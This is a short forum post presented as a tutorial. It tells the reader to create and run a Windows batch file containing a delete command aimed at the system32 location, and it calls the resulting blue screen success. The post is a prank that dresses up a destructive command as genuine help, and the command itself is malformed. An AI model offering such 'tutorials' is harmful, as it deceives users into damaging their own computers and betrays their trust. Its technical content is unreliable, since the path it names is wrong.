.... Since nobody is clever enough to tell him how to properly do it, I'll go ahead with my tutorial. Open up notepad. Type: Del C:\Windows\system32.exe

Then when you click save as select all file formats, and then save it as .bat

If your screen turns blue, you've done it right!
